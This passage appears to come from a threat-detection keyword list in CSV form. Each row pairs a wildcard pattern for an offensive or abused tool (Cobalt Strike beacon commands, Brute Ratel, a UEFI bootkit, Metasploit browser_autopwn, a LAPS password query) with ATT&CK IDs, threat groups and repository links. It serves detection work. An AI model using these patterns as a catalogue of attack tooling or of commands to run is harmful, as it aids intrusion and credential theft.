T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*bolt://localhost:7687*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*Bonfee/CVE-2022-0995*,offensive_tool_keyword,POC,CVE-2022-0995 exploit,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/Bonfee/CVE-2022-0995,1,1,N/A,N/A,5,490,71,2022-03-27T09:07:01Z,2022-03-26T21:46:09Z -*BooExecutorImpl.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bootkit-rs.git*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*bootkit-rs-master*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*BorjaMerino*Pazuzu*,offensive_tool_keyword,Pazuzu,Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.,T1055 - T1027 - T1071 - T1059,TA0002 - TA0005 - TA0011,N/A,N/A,Exploitation tools,https://github.com/BorjaMerino/Pazuzu,1,1,N/A,N/A,3,213,70,2020-08-04T18:49:36Z,2015-10-05T12:23:17Z -*Bot_MSF_Exp_*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Bot_Python_Poc_Log4j2_VMwareHorizon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*bpassthehash*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpowerpick*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bpsexec_command*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsexec_command*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bpsexec_psh*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*brave* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*brc4_ldap_sentinel.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*Brc4ConfigExtractor.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brc4DecodeString*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*breg add *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg delete *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg query *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg_add_string_value*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*bremote_exec*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*brew install sniffer*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,0,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*bropper.py *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*Bropper-main.zip*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*browser.keylog_file.write*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*browser_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*browser_autopwn*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*browser_autopwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_autopwn2_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_exploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and 